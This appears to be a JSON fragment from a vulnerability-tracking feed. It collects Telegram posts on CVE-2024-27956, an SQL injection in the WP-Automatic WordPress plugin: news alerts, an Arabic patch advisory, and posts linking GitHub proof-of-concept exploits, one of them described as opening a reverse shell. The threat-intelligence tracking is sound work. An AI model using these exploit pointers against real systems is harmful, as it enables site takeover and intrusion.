the WP-Automatic plugin is being actively exploited. With a max severity of 9.9/10, this bug enables site takeovers and malicious activities. \n \nDetails: https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html", "creation_timestamp": "2024-04-26T08:00:07.000000Z"}, {"uuid": "9e401529-4d73-460e-87c3-39aa16d251a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://t.me/thehackernews/6584", "content": "\ud83d\udea8 Hackers are abusing WordPress mu-plugins\u2014a hidden auto-run directory\u2014to inject malware, hijack links, and redirect users to scam sites.\n\nAlso, add these to the list of 2024's major WordPress threats:\nCVE-2024-27956 | SQL injection\nCVE-2024-25600 | RCE in Bricks theme\nCVE-2024-8353 | PHP injection\nCVE-2024-4345 | Arbitrary file upload\n\nIf you run a WordPress site, check your mu-plugins folder NOW.\n\n\ud83d\udee1\ufe0f Full story: https://thehackernews.com/2025/03/hackers-exploit-wordpress-mu-plugins-to.html", "creation_timestamp": "2025-03-31T14:10:26.000000Z"}, {"uuid": "55b85d4d-6443-4fca-9636-97b01acc5b4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25267", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:50.000000Z"}, {"uuid": "8b925b7c-7f90-439c-8c73-da1759712858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/GhostClanInt/25072", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:21:17.000000Z"}, {"uuid": "899d6143-23bf-4036-bab1-aad1288b0664", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/CNArsenal/2781", "content": "https://github.com/ThatNotEasy/CVE-2024-27956\n\nPerform with massive Wordpress SQLI 2 RCE\n#github", "creation_timestamp": "2024-07-13T07:28:54.000000Z"}, {"uuid": "b18e36db-7c7c-4a8b-9fae-7e4515420aa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/CybNux/6242", "content": "\u064a\u0648\u0627\u062c\u0647 \u0645\u0627\u0644\u0643\u0648 \u0645\u0648\u0627\u0642\u0639 WordPress \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u0623\u0645\u0646\u064a\u064b\u0627 \u062e\u0637\u064a\u0631\u064b\u0627 \u0628\u0633\u0628\u0628 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062e\u0637\u064a\u0631\u0629 (CVE-2024-27956) \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0641\u064a \u0627\u0644\u0645\u0643\u0648\u0646 \u0627\u0644\u0625\u0636\u0627\u0641\u064a WP Automatic \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639. \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062c\u0647\u0627\u062a \u0627\u0644\u0641\u0627\u0639\u0644\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0647\u0630\u0627 \u0627\u0644\u062e\u0644\u0644 \u0628\u0634\u0643\u0644 \u0646\u0634\u0637 \u0644\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0645\u0648\u0627\u0642\u0639 \u0627\u0644\u0648\u064a\u0628 \u0627\u0644\u0645\u0639\u0631\u0636\u0629 \u0644\u0644\u062e\u0637\u0631. \u062a\u0648\u0641\u0631 \u0647\u0630\u0647 \u0627\u0644\u0645\u0642\u0627\u0644\u0629 \u0634\u0631\u062d\u064b\u0627 \u0634\u0627\u0645\u0644\u0627\u064b \u0644\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u062a\u0623\u062b\u064a\u0631\u0647\u0627 \u0648\u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062d\u0627\u0633\u0645\u0629 \u0627\u0644\u062a\u064a \u064a\u062c\u0628 \u0639\u0644\u0649 \u0645\u0633\u0624\u0648\u0644\u064a \u0645\u0648\u0627\u0642\u0639 \u0627\u0644\u0648\u064a\u0628 \u0627\u062a\u062e\u0627\u0630\u0647\u0627 \u0644\u062d\u0645\u0627\u064a\u0629 \u0645\u0648\u0627\u0642\u0639\u0647\u0645.\n\n\u0631\u0642\u0645 CVE-2024-27956\n\n\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0641\u0648\u0631\u064a: \u0627\u0644\u062e\u0637\u0648\u0629 \u0627\u0644\u0623\u0643\u062b\u0631 \u0623\u0647\u0645\u064a\u0629 \u0647\u064a \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0645\u0643\u0648\u0646 \u0627\u0644\u0625\u0636\u0627\u0641\u064a WP Automatic \u0625\u0644\u0649 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 3.9.2.1 (\u0623\u0648 \u0627\u0644\u0623\u062d\u062f\u062b) \u0641\u064a \u0623\u0642\u0631\u0628 \u0648\u0642\u062a \u0645\u0645\u0643\u0646. \u064a\u0639\u0627\u0644\u062c \u0647\u0630\u0627 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0645\u0635\u062d\u062d \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u064a\u0642\u0644\u0644 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631 \u0645\u0646 \u062a\u0639\u0631\u0636 \u0645\u0648\u0642\u0639 \u0627\u0644\u0648\u064a\u0628 \u0627\u0644\u062e\u0627\u0635 \u0628\u0643.", "creation_timestamp": "2024-04-26T22:29:48.000000Z"}, {"uuid": "fe12ec3c-74af-4d35-909e-81a156599c11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10856", "content": "#exploit\n1. CVE-2023-20872:\nVMware Workstation/Fusion - out-of-bounds read/write in SCSI CD/DVD device emulation\nhttps://github.com/ze0r/vmware-escape-CVE-2023-20872-poc\n\n2. CVE-2024-27956:\nSQLI in ValvePress Automatic plugin\nhttps://github.com/diego-tella/CVE-2024-27956-RCE", "creation_timestamp": "2024-07-21T19:14:26.000000Z"}, {"uuid": "21a83d93-1c10-4d50-920e-458a98f10c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3474", "content": "#exploit\n1. CVE-2023-20872:\nVMware Workstation/Fusion - out-of-bounds read/write in SCSI CD/DVD device emulation\nhttps://github.com/ze0r/vmware-escape-CVE-2023-20872-poc\n\n2. CVE-2024-27956:\nSQLI in ValvePress Automatic plugin\nhttps://github.com/diego-tella/CVE-2024-27956-RCE", "creation_timestamp": "2024-08-16T11:18:01.000000Z"}]}